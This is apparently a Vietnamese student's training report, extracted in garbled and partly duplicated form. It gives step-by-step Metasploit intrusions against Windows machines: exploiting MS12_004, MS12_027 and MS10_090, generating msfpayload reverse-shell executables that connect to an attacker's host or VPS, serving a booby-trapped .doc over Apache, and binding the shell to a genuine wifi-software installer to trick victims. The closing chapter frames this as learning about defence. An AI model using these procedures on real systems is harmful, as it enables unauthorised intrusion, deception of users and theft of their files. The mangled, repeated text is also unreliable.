Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
